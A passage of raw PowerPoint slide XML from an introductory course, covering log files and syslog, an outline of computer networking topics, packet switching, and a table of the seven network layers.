        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="692331" y="1692911"/>
            <a:ext cx="10807337" cy="466344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There are many log files that can be used for security auditing or debugging.</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Log files can record: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IP addresses were visited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programs ran and when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Who logged on and when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resource conditions have obtained.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error conditions were triggered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updates have been installed and when</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>syslog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> is a system for message logging on Linux. Each message is has a facility code, indicating the software type generating the message, and assigned a severity level.</a:t>
            </a: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Each program may also log particular application specific conditions.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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1199552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501649"/>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3, computer networking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="2171700"/>
            <a:ext cx="11225735" cy="3739243"/>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Computer networking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Network layers from hardware to applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Circuit switching and packet switching</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Routing messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Protocols</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Linux networking commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Routers and proxies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Software defined networking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1"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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2408414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13983"/>
            <a:ext cx="10107827" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Computer networking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34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C49FE08C-7145-104B-85D9-D0D493C18922}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="262218" y="1647370"/>
            <a:ext cx="11412187"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Computers would be much less valuable (and much less vulnerable) if they did not connect to each other including over the Internet.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Computer support for networking is extensive and without it, such communications would be onerous.  Important networking support includes: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Physical Communication: the actual physical hardware which converts bit streams to analog signals that can be transmitted over wires (ethernet, USB) or wirelessly.</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Addressing:  Communications originate at addresses (for example, IP addresses) and are sent to destination addresses.  Converting from “understandable” addresses (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.microsoft.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) to network addresses is a complex process.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Routing: On the internet, communications is generally not “point to point” but travels between intermediaries (routers) and these intermediaries must be planned with a view to reducing latency and maximizing throughput.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Networking is so complex, it is often implemented in seven canonical “layers,” each responsible for a portion of the needed capability.</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7753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112440"/>
            <a:ext cx="11998036" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Packet switching and network topology</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="616561" y="2031855"/>
            <a:ext cx="10730312" cy="4227513"/>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Most internet communications occurs over a shared physical link that carries packets between many parties, not dedicated (circuit switched) paths dedicated point to point links.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Devices connected to the physical place messages in conformance with protocols with the addresses of the receiver.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Receivers are responsible for selecting the packets destined for them and not interfering with others.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>The Internet network topology is an interconnection of many networks with seven distinct protocol layers.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35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1840768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A8D1A84-0782-3C4D-988B-62A246B144FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="192127"/>
            <a:ext cx="10455876" cy="896444"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Layer Model for Network Services</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="en-US" sz="4400"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C8F56529-B5D9-E84D-9B4E-B973B8019B14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3500300282"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="251254" y="1196416"/>
          <a:ext cx="11689491" cy="5482809"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="819430">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1803500510"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2068790">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1312688170"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3187185">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="407863192"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5614086">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2374423185"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="365771">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Layer</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" u="none" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Data Unit/Protocol</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18360" marR="18360" marT="9180" marB="9180" anchor="ctr">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dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Function</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054452077"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="506055">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>7</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D8EC9B"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0B0080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:hlinkClick r:id="rId3" tooltip="Application layer"/>
                        </a:rPr>
                        <a:t>Application</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rowSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0B0080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:hlinkClick r:id="rId4" tooltip="Data (computing)"/>
                        </a:rPr>
                        <a:t>Data</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0B0080"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> (http, sockets)</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C"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>High-level </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0B0080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:hlinkClick r:id="rId5" tooltip="API"/>
                        </a:rPr>
                        <a:t>APIs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>, including resource sharing, remote file access</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C"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="967640627"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="993749">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>6</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a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0B0080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:hlinkClick r:id="rId6" tooltip="Presentation layer"/>
                        </a:rPr>
                        <a:t>Presentation</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vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Translation of data between a networking service and an application; including </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0B0080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:hlinkClick r:id="rId7" tooltip="Character encoding"/>
                        </a:rPr>
                        <a:t>character encoding</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0B0080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:hlinkClick r:id="rId8" tooltip="Data compression"/>
                        </a:rPr>
                        <a:t>data compression</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0B0080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:hlinkClick r:id="rId9" tooltip="Encryption"/>
                        </a:rPr>
                        <a:t>encryption/decryption</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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="469056670"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="926374">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>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a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0B0080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:hlinkClick r:id="rId10" tooltip="Session layer"/>
                        </a:rPr>
                        <a:t>Session</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vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Managing communication </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0B0080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:hlinkClick r:id="rId11" tooltip="Session (computer science)"/>
                        </a:rPr>
                        <a:t>sessions</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>, i.e. continuous exchange of information in the form of multiple back-and-forth transmissions between two nodes</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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4121507637"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="749902">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>4</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tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0B0080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:hlinkClick r:id="rId12" tooltip="Transport layer"/>
                        </a:rPr>
                        <a:t>Transport</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tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0B0080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:hlinkClick r:id="rId13" tooltip="Packet segmentation"/>
                        </a:rPr>
                        <a:t>Segment</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0B0080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:hlinkClick r:id="rId14" tooltip="Datagram"/>
                        </a:rPr>
                        <a:t>Datagram</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0B0080"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> (TCP, UDP)</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tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Reliable transmission of data segments between points on a network, including segmentation acknowledgement and multiplexing. </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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3455529636"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="563118">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>3</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tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0B0080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:hlinkClick r:id="rId15" tooltip="Network layer"/>
                        </a:rPr>
                        <a:t>Network</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tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0B0080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:hlinkClick r:id="rId16" tooltip="Network packet"/>
                        </a:rPr>
                        <a:t>Packet</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0B0080"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> (IP)</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tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Structuring and managing a multi-node network, including </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0B0080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:hlinkClick r:id="rId17" tooltip="Address space"/>
                        </a:rPr>
                        <a:t>addressing</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0B0080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:hlinkClick r:id="rId18" tooltip="Routing"/>
                        </a:rPr>
                        <a:t>routing</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0B0080"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0B0080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:hlinkClick r:id="rId19" tooltip="Network traffic control"/>
                        </a:rPr>
                        <a:t>traffic control</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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2008187604"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="623662">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>2</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tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0B0080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:hlinkClick r:id="rId20" tooltip="Data link layer"/>
                        </a:rPr>
                        <a:t>Data link</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tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
